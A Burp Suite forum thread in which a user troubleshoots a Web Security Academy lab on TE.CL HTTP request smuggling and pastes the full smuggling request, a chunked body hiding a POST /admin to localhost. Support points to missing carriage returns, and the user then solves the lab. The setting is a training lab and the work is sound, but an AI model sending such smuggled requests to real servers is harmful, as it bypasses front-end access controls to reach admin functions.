Getting Started with Burp Suite
Burp Suite Documentation
Take a look at our Documentation section for full details about every Burp Suite tool, function and configuration option.
Burp Suite Professional and Community editions | Burp Suite Enterprise Edition |
Burp Scanner | Burp Collaborator |
Burp Infiltrator | Full Documentation Contents |
Burp Extender
Burp Extender lets you extend the functionality of Burp Suite in numerous ways.
Extensions can be written in Java, Python or Ruby.
API documentation | Writing your first Burp Suite extension |
Sample extensions | View community discussions about Extensibility |
Lab: Exploiting HTTP request smuggling to bypass front-end security controls, TE.CL vulnerability
Lab doesn't seem to be working for me, even when I follow the solution. Getting timeout errors. This is what I'm trying to use, host url is correct, target is correct, update content length is not checkmarked, and keey getting time out error after 10000ms. Having similar issues in other labs of this category.
POST / HTTP/1.1
Host: ac451f7f1e1dd31780a427f50095008e.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-length: 4
Transfer-Encoding: chunked
71
POST /admin HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length: 15
x=1
0
Hi,
I have just worked through this lab and was able to solve it using the instructions provided.
Have you added two carriage returns (pressing the Enter key twice) after the final 0 in the request that you have created in Burp Repeater? This is specified in the solution but some people do miss it.
Turns out, I thought that admin panel access would be reflected on the admin webpage---turns out it wasn't. You just had to assume you had admin access/ since no errors were returned. I went ahead and ran the code to delete Carlos and it went through!
Hi Evan,
I am glad that you were able to solve your issue.
Please let us know if you need any further assistance with anything in the future.